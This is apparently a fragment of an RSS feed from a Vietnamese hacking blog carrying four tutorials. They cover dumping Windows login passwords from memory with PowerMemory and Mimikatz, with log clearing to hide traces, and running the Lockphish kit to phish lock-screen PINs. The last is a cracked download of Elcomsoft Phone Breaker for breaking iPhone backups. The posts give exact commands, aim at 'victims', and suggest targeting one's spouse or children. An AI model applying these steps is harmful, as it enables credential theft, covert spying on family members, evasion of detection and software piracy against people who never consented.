					<description><![CDATA[PowerMemory là một tập lệnh mạnh mẽ cho phép người dùng trích xuất và kiểm tra thông tin đăng nhập của người dùng có trong các tập tin và bộ nhớ. Script này được phát triển bởi Pierre-Alexandre Braeken và nó giúp ta lấy Password Login Windows bằng Powershell và CDB (Windows Debuggers). Các tính [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>PowerMemory là một tập lệnh mạnh mẽ cho phép người dùng trích xuất và kiểm tra thông tin đăng nhập của người dùng có trong các tập tin và bộ nhớ. Script này được phát triển bởi Pierre-Alexandre Braeken và nó giúp ta lấy Password Login Windows bằng Powershell và CDB (Windows Debuggers).</strong></p>
<h2><strong>Các tính năng của PowerMemory</strong></h2>
<p>Theo tác giả, tool này hoạt động trên các phiên bản của hệ điều hành Windows, tức là Windows 2003 đến 2012 và cả Windows 10 đều sử dụng được.</p>
<p>PowerMomory đã được thử nghiệm thành công trên các phiên bản 2003, 2008r2, 2012, 2012r2 và Windows 7 32/64 bit, Windows 8 và Windows 10 Home.</p>
<p>Tool này được viết trên nền PowerShell nên khó bị Antivirus phát hiện, các thức hoạt động gần giống với <a href="https://anonyviet.com/hack-windows-bang-mimikatz-giup-hien-thi-password-khong-bi-ma-hoa/" target="_blank" rel="noopener">Mimikatz</a>, giúp hiển thị Password Windows dạng Plain Text.</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/04/94.jpeg" alt="hack password windows từ bộ nhớ ram bằng PowerMemory" title="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 73"></p>
<p><strong>Tính năng chính:</strong></p>
<ul>
<li>Hoàn toàn dựa trên PowerShell</li>
<li>Hoạt động trên máy cục bộ, từ xa hoặc từ file kết xuất được thu thập trên máy</li>
<li>Không sử dụng file system .dll để xác minh địa chỉ thông tin đăng nhập trong bộ nhớ mà là bằng Microsoft Debugger</li>
<li>Sử dụng PowerShell (AES, TripleDES, DES-X) để giải mã mật khẩu.</li>
<li>Phá huỷ Microsfot DES-X không có giấy tờ</li>
<li>Hoạt động ngay cả khi bạn đang sử dụng hệ điều hành khác với victim</li>
<li>Không để lại dấu vết trong bộ nhớ</li>
</ul>
<h2>Cách sử dụng PowerMemory</h2>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/04/95.png" alt="cách dùng PowerMemory xem mật khẩu windows" title="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 74"></p>
<p><strong>Bước 1:</strong> Download <a href="https://codeload.github.com/giMini/PowerMemory/zip/master" target="_blank" rel="noopener">PowerMemory</a> về</p>
<p><strong>Bước 2:</strong> Giải nén file vừa tải</p>
<p><strong>Bước 3:</strong> Mở PowerShell với quyền admin</p>
<p><strong>Bước 4:</strong> Thiết lập môi trường, các bạn nhập lệnh: <code><span style="font-size: 12pt">Set-ExecutionPolicy Unrestricted -force</span></code></p>
<p><strong>Bước 5:</strong> Chuột phải vào file PowerMemory.ps1 chọn <strong>run with PowerShell</strong></p>
<p><strong><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/04/96.png" alt="run with PowerShell" title="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 75"></strong></p>
<p><strong>Bước 6:</strong> Tiếp theo chọn 1, tuỳ chọn này sẽ lấy mật khẩu từ trong bộ nhớ<img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/04/97.png" alt="truy cập ram để lấy password" title="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 76"></p>
<p><strong>Bước 7:</strong> Tool sẽ đòi bạn cấp quyền Admin cho PowerShell, cứ chọn yes thôi<img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/04/98.png" alt="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 47" title="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 77"></p>
<p><strong>Bước 8:</strong> Tiếp theo, bạn chọn 1 để kích hoạt cmdlets<img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/04/99.png" alt="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 48" title="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 78"></p>
<p><strong>Bước 9:</strong> Chọn 1 để lấy mật khẩu trên máy victim</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/04/100.png" alt="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 49" title="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 79"></p>
<p><strong>Bước 10:</strong> Mình chỉ muốn lấy mật khẩu nên sẽ <strong>không</strong> chọn <strong><a href="http://athena.edu.vn/data-exfiltration-la-gi-lam-the-nao-de-ngan-chan-hanh-vi-nguy-hiem-nay/" target="_blank" rel="noopener">exfiltrate</a>.</strong></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/04/101.png" alt="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 50" title="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 80"></p>
<p><strong>Bước 11:</strong> Chọn 1 để xoá dấu vết trong log, tránh để lại dấu vết.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/04/102.png" alt="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 51" title="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 81"></p>
<p>Và thành quả của chúng ta đây</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/04/103-1.png" alt="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 52" title="Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM 82"></p>
<p>Đây Phương pháp này hoàn toàn mới. Nó chứng minh rằng ta có thể dễ dàng hack thông tin đăng nhập hoặc bất kỳ thông tin nào khác từ bộ nhớ RAM của Windows mà không cần sử dụng <strong>ngôn ngữ lập trình loại</strong> <strong>C</strong>. Ngoài ra, với phương pháp này, chúng ta có thể sửa đổi user land và kernel của người dùng mà không bị phát hiện bởi các công nghệ antivirus mới.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>PowerMemory hoạt động trên những phiên bản Windows nào?</h3>
<p>PowerMemory đã được thử nghiệm thành công trên Windows 2003, 2008 R2, 2012, 2012 R2, Windows 7 (32/64 bit), Windows 8 và Windows 10 Home.</p>
<h3>Tôi cần quyền gì để sử dụng PowerMemory?</h3>
<p>Bạn cần quyền quản trị viên (Administrator) trên hệ thống để PowerMemory có thể truy cập và xử lý thông tin từ bộ nhớ RAM.</p>
<h3>PowerMemory có để lại dấu vết sau khi sử dụng không?</h3>
<p>PowerMemory có tùy chọn xóa dấu vết trong log để giảm thiểu khả năng bị phát hiện. Tuy nhiên, việc sử dụng công cụ này vẫn tiềm ẩn rủi ro.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-su-dung-powermemory-de-hack-password-login-windows/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cách dùng Lockphish Hack Password Login Windows, Android và IOS</title>
		<link>https://anonyviet.com/cach-dung-lockphish-hack-password-login/</link>
					<comments>https://anonyviet.com/cach-dung-lockphish-hack-password-login/#comments</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Fri, 27 Mar 2020 09:06:30 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hack password]]></category>
		<category><![CDATA[lockphish]]></category>
		<category><![CDATA[password login]]></category>
		<category><![CDATA[phishing]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=18724</guid>

					<description><![CDATA[Lockphish là công cụ tấn công phishing trên màn hình khóa Windows, Android và iOS. Nếu bạn đang muốn hack password đăng nhập máy tính, điện thoại của vợ/chồng/con cái thì đây là phương pháp đơn giản nhất. Tool được thiết kế giống màn hình đăng nhập của để lấy Password Login Windows, mã PIN [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Lockphish</strong> là công cụ tấn công phishing trên màn hình khóa Windows, Android và iOS. Nếu bạn đang muốn hack password đăng nhập máy tính, điện thoại của vợ/chồng/con cái thì đây là phương pháp đơn giản nhất. Tool được thiết kế giống màn hình đăng nhập của để lấy Password Login Windows, mã PIN Android và Passcode iPhone</p>
<h2>Tính năng LockPhish</h2>
<ul>
<li>Phishing màn hình khóa trên Windows, Android và iPhone</li>
<li>Tự động phát hiện thiết bị</li>
<li>Chuyển tiếp Port bằng Ngrok</li>
<li>Lưu lại Password, IP ra file riêng</li>
</ul>
<h2>Cảnh báo</h2>
<p>Việc sử dụng Lockphish cho các mục tiêu tấn công mà không có sự đồng ý trước là bất hợp pháp. Đó là trách nhiệm của người thực hiện cuộc tấn công trong việc tuân thủ tất cả các luật pháp của đất nước Việt Nam. Các nhà phát triển không chịu trách nhiệm pháp lý và không chịu trách nhiệm cho bất kỳ việc làm sai trái và thiệt hại gây ra bởi chương trình này. Áp dụng luôn cho người hướng dẫn nữa nhé.</p>
<h2>Cách cài đặt</h2>
<p>Hệ điều hành mình sử dụng là Kali Linux 2020.1. Bạn có thể thực hiện các lệnh tương tự trên <a href="https://anonyviet.com/?s=Termux" target="_blank" rel="noopener noreferrer">Termux</a> trên điện thoại hoặc các hệ điều hành Linux khác.</p>
<p>Các bạn chạy các lệnh sau trong terminal:</p>
<p><code>git clone https://github.com/anonyvietofficial/lockphish-new </code><br />
<code>cd lockphish</code><br />
<code>bash lockphish.sh</code></p>
<p>Nếu hệ điều hành của bạn chưa cài Ngrok và PHP thì chương trình sẽ tự tải về và cài đặt trong lần đầu tiên. Các lần sau sẽ không cần cài lại nửa.</p>
<h2><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/03/85-2.png" alt="dùng lockphisng hack password login android và ios" width="632" height="483" title="Cách dùng Lockphish Hack Password Login Windows, Android và IOS 89"><br />
Cách sử dụng lockphish hack password login</h2>
<p>Gõ lệnh <code>bash lockphish.sh</code> để gọi lockphish</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/03/86-1.png" alt="hack pass login windows, android, ios" width="572" height="473" title="Cách dùng Lockphish Hack Password Login Windows, Android và IOS 90"></p>
<p><strong>Redirect after phishing (Default: Youtube):</strong>  bạn điền link trang web sau khi victim nhập mã PIN sẽ được chuyển sang trang đó.Việc này tránh bị nghi ngờ bị hack Password.</p>
<p><strong>Direct link:</strong> là link phishing mà bạn sẽ gửi cho nạn nhân.</p>
<p>Khi gửi link cho nạn nhân, bằng <a href="https://anonyviet.com/?s=social+engineering" target="_blank" rel="noopener noreferrer">phương pháp social engineering</a>, hãy dụ nạn nhân lick vào link đó.</p>
<p><span style="text-decoration: underline;"><span style="color: #ff0000; text-decoration: underline;"><strong>Lưu ý:</strong> </span></span>khi gửi cho nạn nhân phải kèm theo đầy đủ <span style="color: #ff0000;">http<span style="color: #0000ff;">s</span>://xxxxx.ngrok.io</span></p>
<p>Các bạn đưa link này cho victim. Sau khi victim truy cập link sẽ trông như thế này.</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/03/87-1.png" alt="phishing password login android và passcode ios" width="235" height="192" title="Cách dùng Lockphish Hack Password Login Windows, Android và IOS 91"></p>
<p>Link có khả năng nhận diện thiết bị khi click vào. Nếu bạn dùng Windows, thì sẽ hiện ra màn hình khóa của Windows 10. Nếu victim dùng điện thoại sẽ sẽ ra giao diện nhập Password của theo kích thước Android hoặc iOS.</p>
<p>Các bạn <strong><span style="text-decoration: underline;">dụ dỗ</span> victim click vào chỗ link https://google.com</strong>. Trang phishing sẽ tiếp tục đưa victim đến trang nhập mã PIN. Theo phản xạ của victim, victim sẽ nhanh tay nhập mã PIN và nhấn OK.</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/03/88-1.png" alt="giao diện nhập pin code" width="235" height="466" title="Cách dùng Lockphish Hack Password Login Windows, Android và IOS 92"></p>
<p>Victim sẽ được chuyển đến trang web mà chúng ta đã nhập trước đó.</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/03/89.png" alt="link redirect khi phishing xong" width="233" height="435" title="Cách dùng Lockphish Hack Password Login Windows, Android và IOS 93"></p>
<p>Và đây là kết quả trả về.<img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/03/90.png" alt="thông tin phishing được lockphish lưu lại" width="550" height="387" title="Cách dùng Lockphish Hack Password Login Windows, Android và IOS 94"></p>
<p>Phần <strong>Device</strong> là tên thiết bị đã truy cập link.</p>
<p>Sau khi victim nhập mã PIN, trang phishing sẽ trả dữ liệu về attacker. Nội dung hack được sẽ lưu vào trong file <strong>pin.saved.txt.</strong></p>
<p>Các bạn có thể kết hợp với bài <a href="https://anonyviet.com/cach-cai-dat-phishing-gophish-tren-windows-va-linux/">gophishing</a> để double phishing victim. Lấy link đã tạo từ gophishing để điền vào bên lockphish.</p>
<p>Chúc các bạn thành công.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Lockphish hoạt động như thế nào?</h3>
<p>Lockphish tạo ra một trang web giả mạo màn hình khóa của Windows, Android hoặc iOS. Khi nạn nhân nhập mật khẩu hoặc mã PIN, thông tin này sẽ được ghi lại và gửi đến người tấn công.</p>
<h3>Tôi có thể sử dụng Lockphish trên hệ điều hành nào?</h3>
<p>Bài viết hướng dẫn cài đặt trên Kali Linux, nhưng bạn cũng có thể thử trên Termux (Android) hoặc các hệ điều hành Linux khác.</p>
<h3>Việc sử dụng Lockphish có hợp pháp không?</h3>
<p>Sử dụng Lockphish để tấn công các mục tiêu mà không có sự đồng ý trước là bất hợp pháp.  Hãy tuân thủ luật pháp hiện hành.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-dung-lockphish-hack-password-login/feed/</wfw:commentRss>
			<slash:comments>10</slash:comments>
		
		
			</item>
		<item>
		<title>Hack Windows bằng Mimikatz giúp hiển thị Password không bị mã hóa</title>
		<link>https://anonyviet.com/hack-windows-bang-mimikatz-giup-hien-thi-password-khong-bi-ma-hoa/</link>
					<comments>https://anonyviet.com/hack-windows-bang-mimikatz-giup-hien-thi-password-khong-bi-ma-hoa/#comments</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 07 Jan 2020 13:46:23 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hack password]]></category>
		<category><![CDATA[hack windows]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[plaintext]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=17288</guid>

					<description><![CDATA[Hiện nay có khá nhiều cách để xâm nhập Windows khi có đặt Password bằng cách boot bằng USB và xóa luôn Password hiện tại. Như vậy nạn nhân rất dễ phát hiện ra là Password đã bị người nào đó xóa đi. Với tool Mimikatz bạn sẽ dễ dàng cho Windows hiển thị luôn [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Hiện nay có khá nhiều cách để xâm nhập Windows khi có đặt Password bằng cách boot bằng USB và xóa luôn Password hiện tại. Như vậy nạn nhân rất dễ phát hiện ra là Password đã bị người nào đó xóa đi. Với tool Mimikatz bạn sẽ dễ dàng cho Windows hiển thị luôn Password WIndows của nạn nhân. Từ giờ trở đi, bạn chỉ cần đăng nhập bằng Password đó để truy cập vào Windows dễ dàng.</strong></p>
<h2>Dùng Mimikatz để xem Password Windows chưa bị mã hóa</h2>
<p><strong>Mimikatz</strong> là công cụ giúp khai thác lỗ hổng bằng cách hiển thị Password Windows, hash, PIN code và kerberos tickets dạng rõ (PlainText) bằng cách trích xuất tự bộ nhớ RAM. <strong>mimikatz</strong> còn có thể giúp bạn xem pass-the-hash, pass-the-ticket hoặc được xây dựng từ Golden tickets.</p>
<p>Các virus thường được đính kèm công cụ này để có thể lấy hack Password Windows, các thông tin bảo mật, nhằm phục vụ quá trình điều khiển, kiểm soát máy tính của nạn nhânmột cách mạnh mẽ nhất.</p>
<p>Để xem được Password Windows dạng chữ tường minh (plaintext), không bị mã hóa, bạn thực hiện như sau:</p>
<p><strong>Bước 1:</strong><a href="https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" target="_blank" rel="noopener"> Download công cụ Mimikatz</a> sẽ giúp trích xuất Password Windows.</p>
<p>(Password giải nén: anonyviet.com)</p>
<p><strong>Bước 2:</strong> Giải nén file và truy cập đến:</p>
<ul>
<li>Windows 32 bit: vào thư mục <strong>mimikatz_trunk\Win32</strong></li>
<li>Windows 64 bit: vào thư mục: <strong>mimikatz_trunk\x64</strong></li>
</ul>
<p><strong>Bước 3:</strong> Mở file <strong>mimikatz.exe</strong> bằng quyền Administrator</p>
<p><strong>Bước 4:</strong> Trên giao diện của minikatz gõ lệnh <b>privilege::debug</b> để bắt đầu chế độ debug Windows.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/01/debug-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2020/01/debug-1.jpg" alt="Hack Windows bằng Mimikatz giúp hiển thị Password không bị mã hóa 54" width="422" height="190" title="Hack Windows bằng Mimikatz giúp hiển thị Password không bị mã hóa 97"></a></p>
<p><strong>Bước 5:</strong> Tiếp theo chạy lệnh <b>sekurlsa::logonpasswords </b>để lấy password của Windows. Password sẽ hiển thị dạng Plaintext.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/01/hack-pass-windows-1-1.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/01/hack-pass-windows-1-1.jpg" alt="hack password windows bằng Mimikatz" width="616" height="518" title="Hack Windows bằng Mimikatz giúp hiển thị Password không bị mã hóa 98"></a></p>
<p>Ngoài ra bạn có thể kết hợp <strong>sekurlsa::</strong> với các lệnh dưới đây để hiển thị thông tin đăng nhập tùy vào chế độ bảo mật.</p>
<p>msv &#8211; Liệt kê thông tin đăng nhập LM &amp; NTLM<br />
wdigest- Liệt kê thông tin đăng nhập WDigest<br />
kerberos &#8211; Liệt kê thông tin đăng nhập Kerberos<br />
tspkg &#8211; Liệt kê thông tin đăng nhập TsPkg<br />
livessp &#8211; Liệt kê thông tin xác thực LiveSSP<br />
ssp &#8211; Liệt kê thông tin đăng nhập SSP<br />
logonPasswords &#8211; Liệt kê tất cả thông tin đăng nhập của nhà cung cấp<br />
process &#8211; Chuyển (hoặc reinit) sang bối cảnh quá trình LSASS<br />
minidump- Chuyển (hoặc reinit) sang bối cảnh minidump LSASS<br />
pth &#8211; Pass-the-hash<br />
krbtgt &#8211; krbtgt!<br />
dpapisystem &#8211; DPAPI_SYSTEM secret<br />
trust &#8211; Antisocial<br />
backupkeys &#8211; Preferred Backup Master keys<br />
tickets &#8211; List kerberos tickets<br />
ekey &#8211; Liệt kê các khóa mã hóa kerberos<br />
dpapi &#8211; Liệt kê các MasterKey được lưu trong bộ nhớ cache<br />
credman &#8211; List Credentials Manager</p>
<p style="text-align: right;">Tham khảo whitehat.vn</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Mimikatz là gì và nó hoạt động như thế nào?</h3>
<p>Mimikatz là một công cụ khai thác lỗ hổng bảo mật, cho phép truy xuất mật khẩu Windows, hash, PIN và vé Kerberos từ bộ nhớ RAM. Nó hoạt động bằng cách trích xuất thông tin này dưới dạng văn bản rõ, không được mã hóa.</p>
<h3>Tôi có thể sử dụng Mimikatz để làm gì?</h3>
<p>Mimikatz có thể được sử dụng để hiển thị mật khẩu Windows dạng văn bản rõ, giúp truy cập vào hệ thống dễ dàng hơn.  Tuy nhiên, việc sử dụng công cụ này cho mục đích bất hợp pháp là vi phạm pháp luật.</p>
<h3>Việc sử dụng Mimikatz có an toàn không?</h3>
<p>Sử dụng Mimikatz tiềm ẩn nhiều rủi ro bảo mật.  Việc sử dụng công cụ này cho mục đích trái phép là bất hợp pháp và có thể dẫn đến các hậu quả nghiêm trọng.  Chỉ nên sử dụng Mimikatz trong môi trường được kiểm soát và có mục đích bảo mật hợp pháp, với sự cho phép của chủ sở hữu hệ thống.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/hack-windows-bang-mimikatz-giup-hien-thi-password-khong-bi-ma-hoa/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Elcomsoft Phone Breaker 9.4 &#8211; Hack Password Iphone, BackBerry</title>
		<link>https://anonyviet.com/elcomsoft-phone-breaker-9-4-hack-password-iphone-backberry/</link>
					<comments>https://anonyviet.com/elcomsoft-phone-breaker-9-4-hack-password-iphone-backberry/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Thu, 26 Dec 2019 03:52:02 +0000</pubDate>
				<category><![CDATA[Phần mềm máy tính]]></category>
		<category><![CDATA[blackberry]]></category>
		<category><![CDATA[Elcomsoft Phone Breaker]]></category>
		<category><![CDATA[hack password]]></category>
		<category><![CDATA[IOS]]></category>
		<category><![CDATA[ipad]]></category>
		<category><![CDATA[iphone]]></category>
		<category><![CDATA[password]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=17113</guid>

					<description><![CDATA[Elcomsoft Phone Breaker là một ứng dụngcho phép bạn dễ dàng truy cập các file sao lưu được bảo vệ bằng mật khẩu cho các thiết bị di động Apple iOS và RIM BlackBerry. Phần mềm hỗ trợ tất cả các thiết bị iOS (Iphone, Ipad, Ipod) và BlackBerry. Hơn nữa, ứng dụng có thể [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Elcomsoft Phone Breaker là một ứng dụngcho phép bạn dễ dàng truy cập các file sao lưu được bảo vệ bằng mật khẩu cho các thiết bị di động Apple iOS và RIM BlackBerry. Phần mềm hỗ trợ tất cả các thiết bị iOS (Iphone, Ipad, Ipod) và BlackBerry. Hơn nữa, ứng dụng có thể khôi phục dữ liệu và tệp từ Windows Live! và dịch vụ iCloud của Apple.</strong></p>
<p><strong>Elcomsoft Phone Breaker</strong> là công cụ hack password Iphone tốt nhất hiện nay. Hỗ trợ Iphone, Ipad chạy Apple iOS, Windows 10 Mobile và BlackBerry 10, Elcomsoft Phone Breaker có thể thực hiện khai thác Password từ các bản sao lưu iOS. Quá trình giải mã sử dụng GPU tích hợp và tấn công từ điển thông minh. Công cụ có thể tải xuống các bản sao lưu thiết bị từ Apple iCloud và Microsoft OneDrive. Truy xuất các khóa giải mã vào các bản sao lưu BlackBerry 10 trực tiếp từ các máy chủ BlackBerry. Quá trình khôi phục Password được tăng tốc bằng GPU giúp quá trình Hack Password Iphone nhanh hơn.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2019/12/download-Elcomsoft-Phone-Breaker-Full.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2019/12/download-Elcomsoft-Phone-Breaker-Full.jpg" alt="download Elcomsoft Phone Breaker Full" width="639" height="399" title="Elcomsoft Phone Breaker 9.4 - Hack Password Iphone, BackBerry 101"></a></p>
<table style="width: 86.428%;" width="473">
<tbody>
<tr>
<td style="width: 31.2769%;"><strong>Hệ điều hành</strong></td>
<td style="width: 68.5796%;"><strong>Tính năng</strong></td>
</tr>
<tr>
<td style="width: 31.2769%;">Hệ điều hành BlackBerry</td>
<td style="width: 68.5796%;">Giải mã sao lưu (yêu cầu mật khẩu), bẻ khóa Brute-force để sao lưu mã (chỉ được hỗ trợ bởi phiên bản Windows), giải mã thẻ SD, quản lý mật khẩu</td>
</tr>
<tr>
<td style="width: 31.2769%;">iOS</td>
<td style="width: 68.5796%;">Giải mã sao lưu (đã biết mật khẩu), tải xuống tệp và sao lưu từ iCloud (mật khẩu hoặc mã thông báo tài khoản Apple ID), nhận mã thông báo iCloud, phân tích iCloud Keychain</td>
</tr>
<tr>
<td style="width: 31.2769%;">Windows Mobile</td>
<td style="width: 68.5796%;">Tải xuống dữ liệu Windows Phone (SMS, Danh bạ, Ghi chú, v.v.) từ đám mây qua tài khoản và mật khẩu</td>
</tr>
<tr>
<td style="width: 31.2769%;">Bẻ khóa mật khẩu</td>
<td style="width: 68.5796%;">Mật khẩu sao lưu iOS, mật khẩu sao lưu BlackBerry, Trình giữ mật khẩu BlackBerry, Ví BlackBerry, Thiết bị BlackBerry</td>
</tr>
</tbody>
</table>
<h2>Các tính năng chính</h2>
<p><strong>Elcomsoft Phone Breaker</strong> có thể truy dữ liệu trên iCloud và iCloud Drive có hoặc không có Apple ID và mật khẩu. Mã thông báo xác thực thu được từ máy tính của người dùng cho phép đăng nhập vào Apple iCloud mà không cần mật khẩu. Phần mềm hổ trợ hack Password Iphone ở tất cả phiên bản Firmware mới nhất.</p>
<p><strong>iCloud Keychain</strong> là hệ thống đám mây của Apple được sử dụng để lưu trữ và đồng bộ hóa mật khẩu, dữ liệu thẻ tín dụng và thông tin có độ nhạy cao khác trên nhiều thiết bị. Điều đáng nói là, Elcomsoft Phone Breaker hiện là công cụ duy nhất trên thị trường có khả năng truy cập, giải nén và giải mã iCloud Keychain. Trái với việc cấp phép cho các thiết bị mới của Apple.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2019/12/ELCOMSOFT-PHONE-BREAKER-attack-password.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2019/12/ELCOMSOFT-PHONE-BREAKER-attack-password.jpg" alt="ELCOMSOFT PHONE BREAKER attack password" width="474" height="293" title="Elcomsoft Phone Breaker 9.4 - Hack Password Iphone, BackBerry 102"></a></p>
<ul>
<li>Phá mật khẩu và giải mã các bản sao lưu iOS bằng cách tăng tốc GPU</li>
<li>Giải mã iCloud Keychain và Tin nhắn bằng các tệp và tài liệu phương tiện từ iCloud</li>
<li>Lấy dữ liệu được đồng bộ hóa từ tài khoản Apple và Microsoft</li>
<li>Tải xuống bản sao lưu iCloud và dữ liệu được đồng bộ hóa có hoặc không có mật khẩu Apple ID</li>
</ul>
<p>Hỗ trợ: sao lưu iOS cục bộ (iTunes); Sao lưu iCloud và iCloud Drive; dữ liệu được đồng bộ hóa iCloud (nhật ký cuộc gọi, ảnh, lịch sử duyệt web, v.v.) Tài khoản Microsoft (có thông tin xác thực hợp lệ); mã thông báo xác thực iCloud.</p>
<h2>Download Elcomsoft Phone Breaker 9.4 Full</h2>
<p>Elcomsoft Phone Breaker là phần mềm Hack Password từ các thiết bị Iphone, Ipad, Ipod, Backberry. Bạn dễ dàng trích xuất được Password, thẻ tín dụng, thông tin đã lưu trên điện thoại. Với khả năng sử dụng GPU để tăng tốc quá trình giải mã điện thoại, thời gian sẽ rút ngắn tối đa.</p>
<p style="text-align: center;"><span style="text-decoration: underline;"><strong><span style="font-size: 14pt;"><a href="https://www.fshare.vn/file/ZI8EZLM4ECCC" target="_blank" rel="noopener">Download</a></span></strong></span></p>
<p style="text-align: center;"><strong>Password: anonyviet.com</strong></p>
<ul>
<li>Download và cài đặt Elcomsoft Phone Breaker</li>
<li>Copy file unlocked (wtsapi32.dll) vào thư mục đã cài đặt</li>
<li>Mở chương trình và Hack password Iphone</li>
</ul>
<h2>Câu hỏi thường gặp</h2>
<h3>Elcomsoft Phone Breaker hỗ trợ các thiết bị nào?</h3>
<p>Elcomsoft Phone Breaker hỗ trợ các thiết bị iOS (iPhone, iPad, iPod), BlackBerry, và cũng có khả năng truy xuất dữ liệu từ Windows Live và iCloud.</p>
<h3>Phần mềm này có thể khôi phục những loại dữ liệu nào?</h3>
<p>Phần mềm có thể khôi phục mật khẩu, dữ liệu sao lưu, tin nhắn, danh bạ, lịch sử cuộc gọi, ảnh, và nhiều loại dữ liệu khác từ các bản sao lưu thiết bị và dịch vụ đám mây.</p>
<h3>Tôi có cần mật khẩu để sử dụng Elcomsoft Phone Breaker không?</h3>
<p>Tùy thuộc vào nguồn dữ liệu.  Đối với sao lưu cục bộ, bạn có thể cần mật khẩu. Tuy nhiên, phần mềm cũng có thể truy cập dữ liệu từ iCloud và OneDrive với hoặc không có mật khẩu (tùy thuộc vào việc có mã thông báo xác thực hay không).</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/elcomsoft-phone-breaker-9-4-hack-password-iphone-backberry/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
